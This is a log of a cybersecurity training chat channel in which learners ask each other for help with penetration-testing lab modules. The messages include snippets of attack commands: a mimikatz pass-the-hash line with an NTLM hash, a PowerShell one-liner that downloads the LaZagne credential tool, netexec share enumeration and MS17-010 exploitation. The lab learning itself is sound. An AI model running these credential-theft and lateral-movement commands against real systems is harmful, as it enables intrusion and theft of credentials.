#modules

1 messages · Page 208 of 1

unborn pilot
#
limber river
#

why you need to ue evil-winrm ?

short hare
#

that's the exercise question

limber river
short hare
#

xfreerdp /

#

???

limber river
#

you can try

short hare
#

that also donot work

next bronze
#

please spoiler the message, the username is clearly visible in the image

limber river
#

don't overthink things

short hare
short hare
limber river
fathom pendant
limber river
fathom pendant
#

even if it's mentioned in the section it still spoils for people wanting to do it blind

short hare
short hare
short hare
dreamy trail
#

kali

rustic sage
#

Can anyone tell how cubes do we get at the starting?

quick crane
#

can I dm you dear bro

#

can I dm you dear bro

#

can I dm you dearbro

next bronze
plucky nimbus
#

Can anyone help me out with the passwords attack course, Credential Hunting in Linux tab. I'm stuck and I can't see what I'm doing wrong

plucky nimbus
#

Can I DM you??

soft cedar
low crescent
short hare
limber river
short hare
limber river
short hare
limber river
remote latch
#

lol

limber river
#

I am so stupid to be one

remote latch
#

ur better than me

#

tryhard

limber river
#
  • if you know a good mentor , please leeme know so I can learn
limber river
#

maybe ippsec too

remote latch
#

^-^

next bronze
remote latch
#

@limber river you are so wanted

limber river
next bronze
#

what makes you think I know what i'm doing

soft cedar
next bronze
#

monkey typewriter, etc

remote latch
#

or you are unconscious

limber river
remote latch
next bronze
#

I'd rather be unconscious

short hare
#

@limber river will be our new mentor...

remote latch
#

to all of us

soft cedar
limber river
limber river
remote latch
soft cedar
#

@limber river

#

he is the man for the job!!

limber river
night temple
#

nah fr is he actually 😂

#

nah who can i ask man

#

just direct meh

remote latch
autumn pilot
#

check the #rules before asking such questions

limber river
#

dpgg is angry know

night temple
#

ah cool

remote latch
next bronze
#

it's against the rules

remote latch
limber river
next bronze
#

4

remote latch
autumn pilot
#

please keep the channel on topic

night temple
#

aight i guess no luck here

#

take care guys

#

🫡

remote latch
nova viper
#

where will i start the basic from?

#

i m new here

compact patrolBOT
nova viper
#

thnx

tidal kelp
#

On **Attacking Common Applicaitons > Skill assessment I ** > any hints to the format of name for application running?

#

Feel like I'vre tried every possible solution but it is not being accepted

limber river
tidal kelp
#

yeez

#

thanks wolfie

limber river
#

why tf the cheat sheet are on .pdf , miss the .md ones sadglas

remote latch
limber river
remote latch
remote latch
errant swift
#

I'm a bit confused... I get the same value, but the answer is not accepted 🤔 "Incorrect answer!"

tidal kelp
mint lodge
#

command injections skills assessment is wild i just started it and i see people writing they were stuck on it for days

short hare
mint lodge
#

i mean i dont think its going to take me days but still seems hard

#

i managed to inject commands like pwd and id but cant figure out how to cat /flag.txt

cloud urchin
mint lodge
rustic sage
#

Am I being dumb here? Path seems correct to the file

cloud urchin
mint lodge
#

did you do that module?

fathom pendant
rustic sage
#

oh

fathom pendant
#

if it's in the desktop directory: then you just need to specify the filename

rustic sage
#

thanks, I know what I did wrong

fathom pendant
#

the way that the http.server (and any web service) module works is that it serves the current directory it's in/the webroot

rustic sage
#

Yep, as soon as you said it and I check where I run it from.. I was like .. Ahh..

#

LinEnum.sh.1 100%[===================>] 45.54K --.-KB/s in 0s

#

Much better

#

Noo my free instance died and I can't start another.. was so close to finishing

mint lodge
#

get a vm?

#

or pay for a silver annual

#

🤷‍♂️

rustic sage
#

I just paid

next bronze
#

you don't even need annual to get pwnbox, just any plan I think

rustic sage
#

I have a VM just not on this laptop while i'm travelling

#

Just doing all the steps again

fluid basin
#

On the skills assessment for AD-SKills and Enum I cannot find the domain admin hash which is needed for accessing MS01. dumping LSA via mimikatz and using secretsdump only net me the local admin hash. Am i missing something important?

mint lodge
#

i am really struggling on the skill assessment of command injection i tried all the ways of obfuscating / and non of them worked :/

urban wadi
mint lodge
#

from what i see the course contain only level 1's and 2's

buoyant void
#

yeah the tier 3 modules are part of the senior web penetration testing path

#

and sadly not included in the student subscription sadglas

fathom pendant
#

just don't be poor

#

or find some low tier bug on the platform and report it for gold annual

buoyant void
misty cedar
#

question. in NMAP after I got back into doing the modules again, i noticed some forums people use -sSU instead of -sU when filtering an UDP port. Why? is it quieter?

#

I only ask because when i tried both, I got the same result.

fathom pendant
#

-sSU doesn't do the full Syn - Syn/Ack - Ack response

#

-sS does a Syn - Syn/Ack - RST response chain

misty cedar
#

Gotchu

fathom pendant
#

think of -sSU as -sS + -sU

#

(because it is)

#

and because UDP isn't a connection oriented protocol, not all UDP ports are expected to do a full handshake

misty cedar
#

I assumed it was -sS + -sU that at first but then I wanted to know a more detailed reason.

#

also, nice to see you again, you helped me a couple of times when I first did these labs

mint echo
#

Hi guyz, I was asked to perfrom an nmap on the target and identify non-default ports that the telnet service is running on. But cant find the service, I search it up on google and it said default port for telnet is 23 which was also not showing in the nmap.

can someone help me out please?

fathom pendant
#

hint: sometimes people use doubles instead of the non-standard

dreamy cedar
#

hi guys i have a question, in ffuf, exactly fuzzing recursive. what is the flag -e

misty saddle
#

Can anybody help me with a MSSQL syntax? Currently stuck on the last question. Question from academy is: list the non-default database present on the server.

dreamy cedar
#

thanks man

mint echo
rustic sage
#

For the knowledge check on getting started, is this the area I should be focusing on to move to root?

fathom pendant
rustic sage
#

I have been trying 😛

fathom pendant
#

gtfobins is a useful site

rustic sage
#

Ah this was the site I was looking for

fathom pendant
#

i believe i mentioned this to you previously, or maybe it was someone else that was on the same thing

rustic sage
#

Wasn't me

buoyant void
#

What does gtfobins stand for again? I remember Living off the land but can't recall gtfo, unless its as simple as I'm thinking it is lol

fathom pendant
buoyant void
#

Nice

fathom pendant
#

gtfobins is linux, lolbins is windows

#

as generally priv-esc and stuff on windows using native binaries is called "Living off the land"

buoyant void
#

Right makes sense

misty saddle
#

Can anyone explain me why SELECT name FROM sys.databases; doesnt show me any databases in MSSQL? I cannot find any info on why it shouldn't. And everyone in the forum says it's the right syntax. Could it be the box?

urban wadi
#

how can i fix it

rustic sage
#

Got it finally

fathom pendant
#

sometimes it's a bit tricky, especially with windows related boxes

#

restart it and give it like 5-10 minutes before attempting to do any queries

rustic sage
#

Feels good to be getting such a better understanding

misty saddle
#

Okay, thanks a lot. I'll try it out! prayge

faint rampart
urban wadi
#

bruh

misty saddle
#

Been rabbitholing quite a lot on this. But I hope it's just the box.

mint echo
faint rampart
misty saddle
#

Yee, hope it's that! Thanks otherwise 🙂

fathom pendant
#

try interacting with it

faint rampart
next bronze
misty saddle
#

Well, now I cannot even connect to MSSQL sadglas

next bronze
#

the query is correct

misty saddle
fathom pendant
#

could also be your impacket being dumb

misty saddle
#

I'll try to find an alternative. Pretty sad to be stuck at MSSQL :p

fathom pendant
#

¯_(ツ)_/¯

#

there's a handful of things it could be

#

sometimes it's the tool, sometimes it's the lab

#

sometimes it's both

next bronze
#

the answer is always netexec

mint lodge
#

ok the skill assessment was of command injection was a joke i hate over thinking

faint rampart
sleek epoch
#

Not gonna lie HTB academy is way better than porn. I simply love it ❤, the way of presentation actually need in Pentesting. Whoever made the whole module and the path gets my standing ovation. (Yeah obviously respect)

rustic sage
#

I agree it's so good

sleek epoch
#

The compliment may sound sus Or weird but it's the damm truth. 🤳♥️

rustic sage
#

It's a good feeling when you complete certain parts

sleek epoch
#

True + the fact is that the way of thinking and thought process is really unique

#

Absolutely genius folks at HTB

rustic sage
#

I just seen they are going to combine all HTB accounts as well, which is nice

#

1 login for all sites

sleek epoch
#

@low girder you're twitter handle is not showing up on your profile, can you che k that out?

sleek epoch
buoyant void
rustic sage
#

"Soon you will be able to access all HTB platforms with a single HTB Account. Create and manage your HTB Account by visiting the HTB Account page." It's on the /profile/settings on HTB

buoyant void
#

That's awesome

crystal steeple
#

Maybe try sqlsh or something like that i forgot the name

misty saddle
#

okay thanks! i'll try it out

crystal steeple
#

Dont forget .\ since its windows auth

#

.\\

minor stag
#

I can't get through the Oracle TNS module. I followed the instructions to install odat, but when I install it I get File "/home/kali/Documents/Python Scripts/odat/./odat.py", line 54, in <module>
from CVE_2012_3137 import CVE_2012_3137,runCVE20123137Module
File "/home/kali/Documents/Python Scripts/odat/CVE_2012_3137.py", line 9, in <module>
from Crypto.Cipher import AES
ModuleNotFoundError: No module named 'Crypto'

#

I can't find any documentation online that works to fix it

#

Nevermind. I just installed it via apt install and it works now. The module may be outdated.

onyx dust
#

what is the most challenging module you've done?

crystal steeple
#

Password attacks so far lol , so time consuming

potent ermine
crystal steeple
misty saddle
#

Thank god. Finally done with MSSQL. Made it work by switching from my own VM to Pwnbox.

next bronze
#

reinstall impacket probably

misty saddle
#

yeah thats the first thing i'll do now. That shit was exhausting

next bronze
crystal steeple
next bronze
#

why do you need to crack it?

cedar void
#

to get the password for the pertinent user so I can log into|| (172.16.6.3)|| and find that flag.txt

tranquil axle
#

But sometimes a hash is as good as a password

limber river
cedar void
#

I could probably use a tool that takes the hash value I guess

misty cedar
#

Another question. In footpringin Easy, i got into the SSH for Ceil and found the flag.txt but when trying to read the contents it keeps saying "no such file/directory"

crystal steeple
#

Especially when you can’t crack it

next bronze
cedar void
cedar void
brittle arch
#

Hello again , I am having an issue with the Passwords Module , I am in a section where I use Lazagne.exe , I successfully transferred the lazagne.exe file , I ran it through the CMD , The exe runs fine , But then it auto close and I cannot seem to get the files..

brittle arch
rustic sage
#

anyone have any test sites to test my skills?

lusty thicket
#

what skills

trail leaf
#

Anyone up for a DM on the SIEM Fundamentals skills assessment just so I can see if my logic is right?

rustic sage
#

Can't remember if you needed itunes back then and if the device had to be unlocked or not to sync

#

google would be your friend

molten prawn
#

i wanna contact someone about the hacking wordpress module , skill assessment. there is something really really weird and i just wanna know either if its intended or not

acoustic owl
signal condor
#

I am having issues in the intro to linux module for the Find Files and Directories section

#

I am trying to find the config file using the listed settings and I am just not getting anywhere

molten prawn
#

how did you exactly try to find the directory ?

#

im pretty sure find --help will help

signal condor
#

I am searching the /etc/ directory

molten prawn
#

okay but what did you try ?

signal condor
#

find /etc/ -size -28k +25k *.config

#

The time part and size are what is causing me gref

molten prawn
paper basalt
#

you got through it?

#

having similar issues

signal condor
#

Mod what parts?

molten prawn
#

man find will help

#

i can give you the exact comand but what good does that do ?

signal condor
#

Can you at lease tell me if I am on the right track?

molten prawn
#

yes

#

you will find it with find

fathom pendant
prisma spruce
#

Anyone know when the next module will be released? I think this has been the longest time between new modules.

fathom pendant
#

inb4 in ~ 2 days Khaotic drops in and announces the next one Kapp

fathom pendant
#

there's a handful of sections in that module

molten prawn
#

yes

brittle arch
molten prawn
#

what did you try ?

#

cuz i passed it just alright

fathom pendant
#

are you sure the file transferred properly

molten prawn
#

download it and then .\LaZagne.exe

brittle arch
brittle arch
fathom pendant
#

Copy n Paste?

#

gonna need to be more descriptive than that

#

because copy/paste doesn't generally help with transferring files

#

it could be that the file got messed up when transferring

brittle arch
#

Right clicking and copying it >> On RDPed Machine Pasting

molten prawn
#

meh. try this :
1- host the file
2- in powershell : (New-Object System.Net.WebClient).DownloadFile("url", "location")

#

or just wget for that matter idk

brittle arch
#

Alright , Thanks

molten prawn
#

wget <url> -o <location>

fathom pendant
brittle arch
#

Because in the content , It was mentioned you can copy it over RDP

molten prawn
#

you can. its just not the best way

fathom pendant
#

xfreerdp /v:ip /u:user /p:pass /drive:<name>,filepath

molten prawn
#

yes , simple as that

brittle arch
#

Many Thanks !

fathom pendant
#

so if you say, have LaZagne in the tmp directory; you'd specify something like /drive:linux,/tmp/

signal condor
fathom pendant
#

not really

molten prawn
#

no its not

signal condor
#

Find no but

#

Using 5 to ten switchs is

fathom pendant
#

not really

#

lol

molten prawn
#

you dont need 10 args Kappa

fathom pendant
#

the more switches the more specific

molten prawn
#

yes which is why i like to put a hundred switches lol

fathom pendant
#

it's not advanced, it's just basic knowledge

molten prawn
#

yep

fathom pendant
molten prawn
#

idc as long as im putting in more args kek

signal condor
#

I am in a collage level course for a cert and even the person teaching it who has being teaching for years did not even know

molten prawn
#

-jibberish

prisma spruce
#

that's because those certs are garbage

signal condor
#

Comptia Linux+

prisma spruce
#

garbage

fathom pendant
#

yeah Linux+ is a bunch of theory

molten prawn
#

🧢

#

its so easy you cant miss it

fathom pendant
#

CompTia exams are literally just theory courses

prisma spruce
molten prawn
#

yes . multiple choice questions

signal condor
#

But still are used to hire

#

Most apps get trashed if you do not have at lease a+

fathom pendant
#

hell a good portion of the content is all about "who created Linux" and like barely even surface level stuff

molten prawn
#

dude . screw that cert . use find and find what you are looking for

fathom pendant
#

like "when was linux created" yada yada yada

#

not much regrading actual linux usage

prisma spruce
prisma spruce
#

and when you do use them, you just check stackexchange/stackoverflow

molten prawn
#

dude, just, find / -type f -name *.conf -size size -newermt date

#

does not get easier than that tbh kek

molten prawn
#

yes dev null

#

of course. thanks

fathom pendant
prisma spruce
fathom pendant
prisma spruce
#

It would make sense to know them if you worked in Antarctica, I guess

molten prawn
#

then hell -size +10k -size -15k lol

prisma spruce
molten prawn
#

i mean there is a LOT of filtering you can do lol

fathom pendant
molten prawn
#

idk why one would get stuck

fathom pendant
#

genuine q

prisma spruce
molten prawn
#

yes genuine q

fathom pendant
prisma spruce
fathom pendant
#

it rounds up any decimal

prisma spruce
#

Maybe it's just me, but I find that too many of these courses focus on how to use random binaries in a terminal instead of learning how to use linux as a server.

fathom pendant
#

but i will agree that the linux fundamentals course is very jank

molten prawn
#

what does jank mean

prisma spruce
#

mile wide, inch deep

fathom pendant
#

like some of the stuff is just out of order/just weird in general

molten prawn
#

ah

prisma spruce
fathom pendant
prisma spruce
#

And once you've seen it enough times, you won't even have to run linpeas because you know there are only a few places where things are placed.

fathom pendant
#

¯_(ツ)_/¯

molten prawn
#

marcie is a noob (better than me)

prisma spruce
#

Windows: "Here's how to become a 'productive' user of our OS"

#

Linux: "Here's how to use the terminal"

fathom pendant
molten prawn
#

windows just sucks

#

aight people im EXHAUSTED . goodnight

prisma spruce
#

Scheduled tasks? Cron jobs.

fathom pendant
#

sudo? runas

acoustic perch
#

Problem for the most people is they never learn how to USE a computer. why? they think they dont need to. And to be frank there isnt that much education about that in schools.

prisma spruce
fathom pendant
#

chatGPT told me to do it

prisma spruce
#

People whose entire identity is "gamer" spout off the most useless tech advice.

#

It's not limited to desktops of course. The same issue occurs with phones, where they lol only review the camera

fathom pendant
acoustic perch
#

If you know how the computer actually works and how to use it GUI or no GUI is not a problem at all

prisma spruce
#

It becomes really funny when you have videos where they review motherboards and their vrms, but have absolutely no idea what VMs are

#

"I am great at benchmarking"

runic plover
fathom pendant
prisma spruce
#

The only thing you need to know for htb is how to run a script, how to find a file, and how to cat a file.

fathom pendant
prisma spruce
#

It's a bunch of disconnected ideas with no overarching goals to teach a user what to do.

runic plover
#

I mean maybe there is some common GUI knowledge that is assumed to be known. HTB is all mostly about CTF's, I think that in the real world/jobs (Not that HTB isnt a job) but there preparing you to find more than just "HTB{yadayda}".

fathom pendant
next bronze
#

or even the bizness box, that's easy

prisma spruce
runic plover
prisma spruce
#

There's a lot of stuff that isn't taught, like how to use docker, or how to use a credential manager.

next bronze
#

fair

fathom pendant
#

because docker isn't really a base level thing to know

#

or a credential manager lol

#

also most credential managers have their own documentation

runic plover
#

HTB also sets you up to go out and learn other things than just course material tho...

prisma spruce
#

I don't remember if it really teaches you the FHS, and how it works until it doesn't lol.

fathom pendant
#

(it would also look bad on HTB if they use/showcase a credential manager that then later has a leak -- it looks bad)

prisma spruce
fathom pendant
#

I also am assuming a reason not to is because most half-decent cred managers are paid

rustic sage
#

hello gyus

analog dock
#

How long will this last, who knows

#

Hello

prisma spruce
trail leaf
dire sinew
#

Hey guys is there a faster way to brute force ssh with the mutaded list on the Password Attack Module, i tried to up the threads number but ssh doesn't like it

fathom pendant
dire sinew
astral inlet
#

done 🙂

dire sinew
#

mb, thanks!

buoyant void
# astral inlet done 🙂

Damn you've been consistently one module ahead of me, I was hoping to catch up to you as a personal goal of mine 🤣

astral inlet
#

i got some spare time today from my company and used it 😉

#

i do the next module tomorrow then 😉

buoyant void
#

Alright so I got the rest of the day to catch up got it

buoyant void
#

Damn now I just want to watch that movie for the 100th time

astral inlet
#

i was stuck for about 3 days on XXS

buoyant void
#

Yeah I'm trying to get through that today, probably my least favorite module so far

astral inlet
#

you will 🙂

astral inlet
#

its not my fv tbh

buoyant void
astral inlet
#

from the topic, but the module itself is very good

buoyant void
astral inlet
#

btw one in this room has passed flag 12 today 😉

#

not me

old bolt
#

Stuck on file upload skill assessment. Can't figure out how to read the .PHP files to find upload path.
Was able to bypass, and upload svg files, but svg content just gets returned in base64 and doesn't read the PHP files
Any help would be sweet

astral inlet
#

i will do it probably tomorrow please cover spoilers 🙂

crystal steeple
#

im stuck at skills assessement of pivoting module in : For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.

#

i already found vfrank hash that i couldn't crack

#

but idk how to proceed

fathom pendant
#

I don't recall if his password was uncrackable

astral inlet
#

did you " enumerate the networks" ?

crystal steeple
#

tried the netsh on rdp on first host pivoted

crystal steeple
astral inlet
#

did you chisel ?

crystal steeple
#

no i didnt

#

i used dynamic port forwarding with ssh

#

then rdped into ||172.16.5.35||

#

||got the lsass.exe||

#

how do you mark the spoil in the chat

astral inlet
#

how many nics are on 172. ?

crystal steeple
#

im spoiling rn

fathom pendant
#

||

crystal steeple
#

||jj

fathom pendant
#

wrap it in the ||

crystal steeple
#

||ll||

fathom pendant
#

ya goon

crystal steeple
astral inlet
#

||there is a powershell script for enum ||

crystal steeple
astral inlet
#

should do the same

crystal steeple
#

and still got one host i will try with powershell

#

which is ||.6.35||

#

lemme try again

minor stag
#

Does anyone know how to deal with the following when I connect to an FTP server and try to run commands "229 Entering Extended Passive Mode (|||17211|)
150 Opening ASCII mode data connection for file list
226 Transfer complete
"

astral inlet
#

pasv

minor stag
#

invalid command

astral inlet
#

or "help" 😉

minor stag
#

I ran help, but all of the commands listed on the help page give me the same response

astral inlet
#

maybe passive ,, try to use help

limber river
crystal steeple
#

imma try it after i finish the module with rhe sections methods

minor stag
astral inlet
#

'passive'

minor stag
#

Well, that did something, but now I get "EPRT command successful" instead of the Passive Mode one lol

crystal steeple
astral inlet
#

great 🙂 , HF

old bolt
#

Can someone dm for help on file upload skills assessment. Stuck trying find path.

crystal steeple
#

i was putting the wrong ip

#

idk why the cmd didnt show me the other hosts available

#

probably one for the double pivot and another for DC

astral inlet
#

ioxid on ncx to test if possible

#

pro tipp 😉

crystal steeple
#

what

#

didnt understand lmao

astral inlet
#

nxc smb $IP -L

buoyant void
#

I gotta start using netexec, I'm just in such a habit of always running CME it's hard to break

#

its the same syntax as CME I'm assuming

astral inlet
#

its quite the same tool but a bit better

fathom pendant
#

It's literally the same tool

buoyant void
fathom pendant
#

It's a fork of CME that was created due to the owner of CME wanting to run it in a different way than the contributors desired

#

So they forked off and made it their own tool

#

<@&861185840277487616>

fathom pendant
#

You are placing serious trust in strangers, not to mention, we don't know if that number is actually yours. And you're trying to have some randos spam call/harass someone

misty cedar
#

mostly just getting errors on opening community files

astral inlet
#

maybe he is from norton or paypal 😄

misty cedar
#

this was the wrong chat.

fathom pendant
#

This is the right chat for module assistance @misty cedar

misty cedar
#

I meant on continuing my sentence. XD but this is the right one indeed

fathom pendant
#

Step 0, enumerate

crystal steeple
#

duh im stuck on getting to the DC

#

any hints?

#

on skills assessement on pivoting module

fathom pendant
crystal steeple
#

the Z drive

astral inlet
#

how long are you working on this ?

fathom pendant
#

Weird, I could have sworn I didn't need to hop to the dc I was able to access the Z:\ drive just fine

crystal steeple
astral inlet
#

try nxc smb -u $user -p $pass --shares

crystal steeple
#

i don't have a pw only hashes

astral inlet
#

if hash is valid use -H

prisma spruce
fathom pendant
crystal steeple
#

its says port 445 not opened

prisma spruce
#

This project was initially created in 2015 by @byt3bl33d3r, known as CrackMapExec. In 2019 @mpgn_x64 started maintaining the project for the next 4 years, adding a lot of great tools and features. In September 2023 he retired from maintaining the project.

crystal steeple
#

i mean the error is socket error or timeout!

fathom pendant
prisma spruce
#

link?

fathom pendant
#

It's on the github page

astral inlet
#

belongs into every pentester toolset

prisma spruce
#

lol drama

crystal steeple
#

im done cant access this shit

astral inlet
#

then find another way 🙂

crystal steeple
#

my head wont spit more ideas to try rn

#

im still trying lol

#

i need a hint

astral inlet
#

only 2 questions to go ?

crystal steeple
#

i just need to get to the DC

astral inlet
#

"just" 😄

crystal steeple
#

hahahaha

#

wait lemme try my last idea

#

nvm

astral inlet
#

did not work ?

crystal steeple
#

didnt sadglas

astral inlet
#

dm me

mellow delta
#

good afternoon, I am stuck once again. I am trying to find the solution to what the full system path is for this modulehttps://academy.hackthebox.com/module/112/section/1067. I have tried to pwd and come up with the path but it keeps saying no

#

I am very stuck here

real dove
#

i need help with this How many total packages are installed on the target system?
Ive tried all commans I know and the ones of the module but i cant find the answer

mellow delta
#

have a little chat with chatGPT

real dove
#

already tried

#

and nothing BlathersShock

mellow delta
#

that's how I feel with where I am stuck

fathom pendant
mellow delta
#

//<ip>/<share>/<dir> that is the generic version of what I have found

mellow delta
#

not sure what Rpc means

fathom pendant
#

Read the section

#

My autocorrect just auto capitalized the R

#

But it's definitely in the section

astral inlet
mellow delta
#

the path it's showing is a windows drive, but this is al linux system?

fathom pendant
mellow delta
#

I appreciate your helping but that doesn't help me. Critical thinking and trying new approaches is what I have been doing. It would be helpful to know a direction to think in not to just think critically

#

I have no idea where to take the knowledge. I have the windows path for the share, but that isn't the format the answer needs. I try to put it as a linux path but it doesn't take it

#

telling me to look at rpc was very helpful, that kind of advice is what I am talking about

mellow delta
fathom pendant
#

Well you have the right idea with linux, so don't overthink it

mellow delta
#

I guess I am overthinking it because I am completely lost lol

#

here is what I am thinking, maybe you can tell me if I am in the right direction the generic version of the what i found was c:<dir><share>\ and that needs to be translated into a linux format of <ip>/<dir>/<share>

minor stag
#

I'm completely at a loss. I'm doing the Footprinting Lab - Medium. I got into the SMB server, grabbed the admin password, and got to the login screen here. I've tried every combination of username and password I can figure out, but nothing seems to work.

mellow delta
fathom pendant
#

Smb is a windows protocol

mellow delta
minor stag
#

I figured it out. I was supposed to open the server management studio as admin and the password worked there.

fathom pendant
astral inlet
#

server message block

minor stag
mellow delta
# fathom pendant Smb is a windows protocol

here is what I am thinking, maybe you can tell me if I am in the right direction the generic version of the what i found was c:<dir><share>\ and that needs to be translated into a linux format of <ip>/<dir>/<share>

fathom pendant
#

Reverse

#

It's because linux has a different filesystem format

#

But it needs to be translated for windows

mellow delta
#

is the ip address part of what HTB is expecting? it must be because how else does it know where the server is

fathom pendant
#

The host OS running the smb client was linux

fathom pendant
#

You need the network path to be able to interact with shares

#

The network path can be the ip, or it can be the hostname of the device sharing it

mellow delta
fathom pendant
#

But the question is specifically asking the full system path of the share

#

Which if it's not the windows path, it's linux

mellow delta
#

Yeah, i understand that it wants the full linux path, im just not seeing how to get there, I think I now understand what you meant about reversing the order

#

but I am just not finding the solution here

astral inlet
#

there is nothing in the module ?

mellow delta
#

that kind of advice isn't really helpful

fathom pendant
mellow delta
astral inlet
#

which tool are you using ?

mellow delta
#

rpccliet

astral inlet
#

for smb ?

mellow delta
#

sorry rpcclient

#

that's what the module used to output the smb path

fathom pendant
astral inlet
#

windos is normally \\,,,\

mellow delta
fathom pendant
#

It's asking for the file path on the host machine

#

Not the share path

mellow delta
astral inlet
#

sorry did that module some time ago

fathom pendant
mellow delta
#

all good, I am new at this and just lost right now

fathom pendant
#

||/h*/s*||

astral inlet
#

wait i staret the instance

fathom pendant
#

Yes

#

So just flip it

#

Don't include the last /

#

Spoilers btw

mellow delta
#

I know,sorry was trying very hard to not go herte

fathom pendant
#

I recommend deleting

astral inlet
#

wich questionnumber is it ?

fathom pendant
#

Also: the question gives you the format it wants

mellow delta
#

yea, i have seen that

fathom pendant
#

So why are you including the trailing /

astral inlet
#

ok understood

mellow delta
#

finally

astral inlet
#

where are user profiles saved on windows ?

mellow delta
#

sorry

fathom pendant
mellow delta
#

sorry, this is difficult for me

fathom pendant
#

I mean it's as simple as flipping the \ around

astral inlet
#

yes

fathom pendant
#

From \ to / and formatting to how the question wants

#

Question says it doesn't want the last /

#

So you don't include it

magic forum
#

WINDOWS EVENT LOGS & FINDING EVIL mini-module: the RDP session is very unstable and keeps disconnecting. any ideas or workarounds?

fathom pendant
#

Use tcp vpn, change vpn region, wait 5-10 minutes after spawning lab

astral inlet
#

good night and have fun 🙂

bright rune
#

I f'ed up. I'm on passwords. I beat mutations, then headed home from work. In the meantime, the VM reset. I don't have the creds anymore for the next task. Can someone DM me the creds? I don't want to spend another eternity cracking that password again. Can provide proof of completion of last task (if allowed. if not, ignore this)

onyx dust
#

@x90 i thought ur name was green

fathom pendant
buoyant void
#

This XSS module is testing my patience damn targets don't want to spawn

terse cedar
#

targets on my lab arent spawning either

buoyant void
#

lol it's like the website heard me complaining, finally spawned

terse cedar
#

same

buoyant void
#

try yelling at the website it worked for me

onyx dust
#

it's amusing that the module infrastructure which cost more than htb gaming platform is not as reliable

#

if it weren't for such shitty and unreliable module machines i wouldn't be in this discord at all. look what the cat dragged in

elfin drum
#

Hello, I have a problem with module Password Attack Pass the Hash section. I got the flag for question 1, 2 and 3 but for question 4. Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. The modules said that we can use RDP to connect to the administrator account after we impacket-psexec in to enable RestricedAdminMode yet I can't do that. I can only use RDP to connect to david account using his hash, . Since mimikatz command will spawn another cmd in david account, I need to do that using RDP, but when I use RDP with david account and mimikatz it shows this error

ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

Also when I try to RDP to administrator account this is the error I got

#

Is this normal, if it's normal, what step did I do wrong?

next bronze
#

the error is access denied, are you running mimikatz as admin?

#

also, you don't need rdp to run mimi, you can use it in non interactive mode like this

.\mimikatz.exe "privilege::debug" "token::elevate" "<command here>" "exit"
elfin drum
#

Understood, I will try that first, thanks for the reply.

elfin drum
#

In my understanding, I need to just do PtH attack by first PtH to administrator account, then use mimikatz to PtH to David's account, then I should be able to have the permission to view the flag from \\dc01\david right? but after I execute this mimikatz command ||.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:dc01 /run:cmd.exe"|| I still am the same administrator account, can you please clarify what did I do wrong? Thanks

next bronze
#

why not pth to dc01 using evil-winrm directly? if you want to double pth with mimikatz, since it's running in non interactive mode, you'd need to get the flag in the command itself, mimikatz exits and it won't change the current user context

#

oh the question is telling you to rdp, so: enable rdp as admin, rdp in and use mimikatz to pth

terse cedar
#

Currently working my way through 'The Live Engagements' of the Shells & Payloads module, and I've stuck on Host-3. I know It's exploitable by MS17_010. The hint in the Lab basically give it away, and the MSF auxiliary module confirms it, but running ms17_010_psexec keeps returning "exploit completed but no session was created".

Could anyone who has completed this possibly point me in the right direction?

next bronze
#

make sure you LHOST and LPORT is correct

terse cedar
#

The LHOST is set to foothold machine I have to RDP into, and I've tried changing the port half a dozen times

#

along with default 4444

#

do i need to open a seperate netcat listener and point it to there?

next bronze
#

that lhost would be incorrect, run ifconfig to see what IP you should set it to, and read the "Target Hosts" part again

prisma spruce
next bronze
#

in this case you're given an attack host to rdp into, so it wouldn't be tun0

cloud urchin
#

Any tips on Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) with the ADCS module? I've tried everything. ntpdate, manually changing the date on my machine, nothing works. I went back and looked at other people mentioning this problem and wasn't able to find a solution either.

slate carbon
#

I'm working on Attacking Enterprise Networks and am stuck on sending the HTTP TRACK request through my browser.
I tried porting the request from burp into the default burp proxy browser but it also does not handle TRACK method requests.

Anyone that completed this module able to help me out?

slate carbon
#

I've tried using TRACE instead because I see it as an option in Firefox/Chrome but Trace is not the same as Track

thorn urchin
cloud urchin
thorn urchin
#

VM or not sounds like your time is auto updating and you need to turn that off

cloud urchin
#

it's not, it's on manual time. can't even enable it because kali is 'quiet' by default and doesn't call out to ntp servers

#

and if it is, i don't know why or how

thorn urchin
#

I mean those are your two scenarios. Either your time is auto updating, or youve simply set it wrong

#

There really isnt a third option here

cloud urchin
#

right, which is why i came here for help because it's not working

#

i'm just going to skip that method for now and hope it's not required to complete the module

thorn urchin
#

it comes up a couple times

cloud urchin
#

i'll try from the attack box if it comes up

limber river
slate carbon
analog dock
#

Neither do we with this information

vestal crescent
#

what does this mean on weekly streak??

#

1 day left?

next bronze
#

you have a one week streak and yet to complete this week's

vestal crescent
#

word

fair surge
#

Is there any chat where i can ask general cybersecurity questions

raven lagoon
inland shoal
#

hi for this part, i assume $0 i assigned to script.sh?

raven lagoon
inland shoal
solar pecan
#

hello guys.. a question gobuster dns enumeration is the same with subbrute ?

white basalt
#

hello! I meet a problem: I'm working on ACTIVE DIRECTORY ENUMERATION & ATTACKS---Kerberoasting - from Windows, when I run kirbi2john.py and got a blank blank crack_file. Can someone help plz? Thanks in advacd.

#

Hello L0ccc! Sorry for disturbing. I have the same question: where is the kirbi file? Did you find it? Thank you.

tidal kelp
crystal steeple
#

the skills assessement took everything from me

white basalt
short hare
#

with a cool mind follow the steps,
it will led to the answer

astral inlet
#

hi 🙂

neon minnow
short hare
astral inlet
tacit bay
#

anyone able to help me out on "Attacking Thick Client Applications" ? Struggling to find the correct RW MAP

minor stag
#

What am I doing wrong? I can't answer the questions because I can't seem to query to get the MX server.

minor stag
#

Oh, so this module is outdated then

fathom pendant
#

However dig has the MX query

#

It's not really outdated; it's moreso read how the tool works

#

Also since PayPal is a public site, you don't need to specify an ip/nameserver

#

As its accessible via public domain servers

minor stag
#

Okay, yeah, I got the answer using dig -t MX.

#

Was there something wrong with my nslookup query or does it just not work like that anymore since it's deprecated?

fathom pendant
#

You should be able to run a non-specific query on it with nslookup

#

The only thing deprecated is the "any" query

minor stag
#

What does this mean? I spawned the system but these addresses don't seem to exist.

astral inlet
#

thsts the answer to your question 🙂

minor stag
#

